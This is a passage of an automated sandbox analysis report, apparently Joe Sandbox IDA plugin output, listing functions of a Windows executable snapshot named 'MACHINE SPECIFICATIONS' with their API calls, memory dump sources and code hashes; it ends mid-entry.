Instruction Fuzzy Hash: 3A51C122B0860795EA559B56A81267DE350AF48BB0F580733DE3DAB7D4EF3EE4658300

Function 00007FF6D38BBB90 Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6D38BBB8E), ref: 00007FF6D38BBB9C
TerminateProcess.KERNEL32(?,?,?,00007FF6D38BBB8E), ref: 00007FF6D38BBBA7
ExitProcess.KERNEL32 ref: 00007FF6D38BBBB6

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e24c6605f6d43ab4aa00d27b71cc95ebf702fc7ef2775827537e46ee3fb7471c
Instruction ID: 822f9695e0d95771ad705abf4b7fd83a994fe423ed8d447026e71e3b2bb66d1c
Opcode Fuzzy Hash: e24c6605f6d43ab4aa00d27b71cc95ebf702fc7ef2775827537e46ee3fb7471c
Instruction Fuzzy Hash: AED0C918F0860786EB086B705CAB13E92526F48712B18193AC84FBB356CE6F686C4240

Function 00007FF6D38BE7B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32 ref: 00007FF6D38BE804

Strings

, xrefs: 00007FF6D38BE847

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 05f434645e4e8af9bdf222389750413e3acad8126abfb95e445cd21c809fbb6b
Instruction ID: b888941d4bde0cc359d75cee496cfa1d7bd4b2cf36eb6904e505b0bc1420ee62
Opcode Fuzzy Hash: 05f434645e4e8af9bdf222389750413e3acad8126abfb95e445cd21c809fbb6b
Instruction Fuzzy Hash: A051A072A1C7C28AE7618F24E0853AEBBA0F748344F584136D68D97A85CF7DE169CB41

Function 00007FF6D38BFBA4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringW.KERNEL32 ref: 00007FF6D38BFC7B

Part of subcall function 00007FF6D38BF850: VirtualProtect.KERNELBASE ref: 00007FF6D38BF96D
Part of subcall function 00007FF6D38BF850: VirtualProtect.KERNELBASE ref: 00007FF6D38BF99E

Strings

LCMapStringEx, xrefs: 00007FF6D38BFBD5, 00007FF6D38BFBE3

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ProtectVirtual$String
String ID: LCMapStringEx
API String ID: 352833117-3893581201
Opcode ID: db1306e16a7c920c5ed19cfc2433b1637a1bfef7af75a7029610fe3f2b3f40f8
Instruction ID: 3419d0eb36f39819985ac4119b4dbfead352ed65e50e819cb2cb0c77a0324cf2
Opcode Fuzzy Hash: db1306e16a7c920c5ed19cfc2433b1637a1bfef7af75a7029610fe3f2b3f40f8
Instruction Fuzzy Hash: C1214C32A08B8285D660CB16F45166EB3A4FB98B94F444236EE9C93B99DF3DD460CB00

Function 00007FF6D38BED50 Relevance: 3.2, APIs: 2, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D38BE69C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF6D38BE9E8), ref: 00007FF6D38BE6C6

IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF6D38BEB19), ref: 00007FF6D38BEDCB
GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF6D38BEB19), ref: 00007FF6D38BEE0F

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 6c2fd919c8ec8e2be9969b1c966316e50cfc3295412c033467f330163f34f96e
Instruction ID: 1380dd3c868ec346d2b82496b9757bfdc54521a2b2982077aa196e8cb3ed2e08
Opcode Fuzzy Hash: 6c2fd919c8ec8e2be9969b1c966316e50cfc3295412c033467f330163f34f96e
Instruction Fuzzy Hash: E881A062A087838AEB758F25B04617DF6A1EB44780F5C4137D68EAB790DE3EF561C302

Function 00007FF6D38BD710 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D38B5A73), ref: 00007FF6D38BD726
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D38B5A73), ref: 00007FF6D38BD730

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 51739b51916b3151225c6e6edc1993a8a9b3f9984933849011ad3744d57a2e7a
Instruction ID: 739703da5781d0a325155dc894311a3579984ddd44eb580fae3c0d6ef914aff0
Opcode Fuzzy Hash: 51739b51916b3151225c6e6edc1993a8a9b3f9984933849011ad3744d57a2e7a
Instruction Fuzzy Hash: C7E01240F0A60397FF19ABF2685B1BC81915F94741F044437C90EFA252EE3EB8B94600

Function 00007FF6D38BBAA6 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6D38BBAD3

Part of subcall function 00007FF6D38BBBC0: GetModuleHandleExW.KERNEL32 ref: 00007FF6D38BBBE5
Part of subcall function 00007FF6D38BBBC0: GetProcAddress.KERNEL32 ref: 00007FF6D38BBBFB
Part of subcall function 00007FF6D38BBBC0: FreeLibrary.KERNEL32 ref: 00007FF6D38BBC17

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 759b086f017f4cbc781d5fb8ef3b2e44cff8ccd82de484c4f9738269355419c9
Instruction ID: b94f6fde80048d8578863d1ecd5bdf6dc2d8721c40c125df7ff12df4d907ae2c
Opcode Fuzzy Hash: 759b086f017f4cbc781d5fb8ef3b2e44cff8ccd82de484c4f9738269355419c9
Instruction Fuzzy Hash: 6D218132E1470389EB219F74C4822FE77A0EB04718F04063AD65DABAD9DFBAD465C750

Function 00007FF6D38C0938 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D38BD690: HeapAlloc.KERNEL32(?,?,00000000,00007FF6D38BD113), ref: 00007FF6D38BD6E5

InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FF6D38C0AA8,?,?,?,?,?,00007FF6D38BFE96), ref: 00007FF6D38C097F

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: AllocCriticalHeapInitializeSection
String ID:
API String ID: 2538999594-0
Opcode ID: 537838cb1317949a6f9c73cdd8af1db40e1af7e14896c0ec4a1adf1e3df81d13
Instruction ID: 84396bc23aca5faab89130d16b740bce2ff54538e57393bf69e969368b9cb2ec
Opcode Fuzzy Hash: 537838cb1317949a6f9c73cdd8af1db40e1af7e14896c0ec4a1adf1e3df81d13
Instruction Fuzzy Hash: F411CE337287C292E6148F16D14126DA760E745BA0F988636E3AD97BC5CF39E476C700

Function 00007FF6D38BFCFC Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FF6D38BFD1C

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f1e51b05af41330d80050271fef2003a41398b51a227df4516bf7e21215fc1a8
Instruction ID: a787e57044b781016251beb9d15a46ff95d396172abd5667a1dc9c049f7219e0
Opcode Fuzzy Hash: f1e51b05af41330d80050271fef2003a41398b51a227df4516bf7e21215fc1a8
Instruction Fuzzy Hash: E3D01225B35541C3E300DB21F846BA9A328F798711FC04037E94ED2A94CF7DC669CB50

Function 00007FF6D38BD690 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6D38BD113), ref: 00007FF6D38BD6E5

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: fb4d3f3f397d78687145764b335fb6ef274ae5c4cf7c2d1c9701044602e1a3cc
Instruction ID: 234275bb0b6435c7306f6f3ab5913ac81c68a989498166729ec50a82d0d5d0d2
Opcode Fuzzy Hash: fb4d3f3f397d78687145764b335fb6ef274ae5c4cf7c2d1c9701044602e1a3cc
Instruction Fuzzy Hash: BCF06D50B0B60761FE546EA658133BDD2845F8AB80F0C4033C90EEE3C1EE3EE4A88650

Non-executed Functions

Function 00007FF6D38B63C0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6D38B63DC
RtlCaptureContext.KERNEL32 ref: 00007FF6D38B6409
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6D38B6423
RtlVirtualUnwind.KERNEL32 ref: 00007FF6D38B6464
IsDebuggerPresent.KERNEL32 ref: 00007FF6D38B64B8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6D38B64D5
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6D38B64E0

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: ac7396ae24a3e0db81380c9bda2e17457e1aa5d46f05cf9d3f0d2264ee41f873
Instruction ID: d7091f4b8534fbc0a223f37830937909f61d29be311f35d0c31d6443bc45710a
Opcode Fuzzy Hash: ac7396ae24a3e0db81380c9bda2e17457e1aa5d46f05cf9d3f0d2264ee41f873
Instruction Fuzzy Hash: 69313E72609B8286EB608F60E8413EDB364FB88744F44413ADA4EA7B94DF3DD658C710

Function 00007FF6D38BB3D8 Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6D38BB463
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6D38BB47B
RtlVirtualUnwind.KERNEL32 ref: 00007FF6D38BB4B6
IsDebuggerPresent.KERNEL32 ref: 00007FF6D38BB4EF
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6D38BB4F9
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6D38BB504

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 1b74ad34ea0ceaf2102835a5d87ff35ace2e9eb83bfd767c9ca874fbbeaf8c87
Instruction ID: 7c915eb0cca4a32e29b3e9362905321a67598f9d0e587907533c4dde43cdd1c2
Opcode Fuzzy Hash: 1b74ad34ea0ceaf2102835a5d87ff35ace2e9eb83bfd767c9ca874fbbeaf8c87
Instruction Fuzzy Hash: D5418732618F8186DB60CF25E8413AEB3A0FB88754F540236EA8EA7B59DF7DC555CB00

Function 00007FF6D38BDE88 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6D38BE009
FindNextFileW.KERNEL32 ref: 00007FF6D38BE13F
FindClose.KERNEL32 ref: 00007FF6D38BE17F
FindClose.KERNEL32 ref: 00007FF6D38BE1AB

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 4b5a793302f681b0c1573c31ab85d78563a9608e57e02b890981a7e8df08cf7e
Instruction ID: 755ad221923d1e3ddfdb3d6637d3a4e6ef944e3f542710c0084f096d01eeb483
Opcode Fuzzy Hash: 4b5a793302f681b0c1573c31ab85d78563a9608e57e02b890981a7e8df08cf7e
Instruction Fuzzy Hash: 52A10822B0C78359FB208B75A4521BDEBA0AB41794F184137DA8DBF795CE3EE466C701

Function 00007FF6D38B6754 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6D38B6780
GetCurrentThreadId.KERNEL32 ref: 00007FF6D38B678E
GetCurrentProcessId.KERNEL32 ref: 00007FF6D38B679A
QueryPerformanceCounter.KERNEL32 ref: 00007FF6D38B67AA

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f0f036f421e1735a7d5d0dffd836b2c1ec867d3e14f9b885b3af06b6c672f4cd
Instruction ID: e3d797e39a6a606cc4c60d422b7bb98ea3afd1ba0d629ce3bbbf601d8edf3ad4
Opcode Fuzzy Hash: f0f036f421e1735a7d5d0dffd836b2c1ec867d3e14f9b885b3af06b6c672f4cd
Instruction Fuzzy Hash: 77113022B14F018AEB40DF61E8552BC73A4FB59758F440E32DA6EA67A4DF7CD568C340

Function 00007FF6D38B65D8 Relevance: 4.5, APIs: 3, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF6D38B66D9), ref: 00007FF6D38B65E3
UnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF6D38B66D9), ref: 00007FF6D38B65EC
GetCurrentProcess.KERNEL32(?,?,00000001,00007FF6D38B66D9), ref: 00007FF6D38B65F2

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CurrentProcess
String ID:
API String ID: 1249254920-0
Opcode ID: 75ba8bedca41732959961a63f0273168d3b7921c478cae7fb6edc7ff6a08810f
Instruction ID: cc930614a00f412a8d45b42fce99819d208a6c24a3e6df4ef23b4ae4a2da4005
Opcode Fuzzy Hash: 75ba8bedca41732959961a63f0273168d3b7921c478cae7fb6edc7ff6a08810f
Instruction Fuzzy Hash: AED0C755E18506C6F71817717C1603D5221BF5CB65F0C1636C90FB5310DF3E54AD4300

Function 00007FF6D38BDD04 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

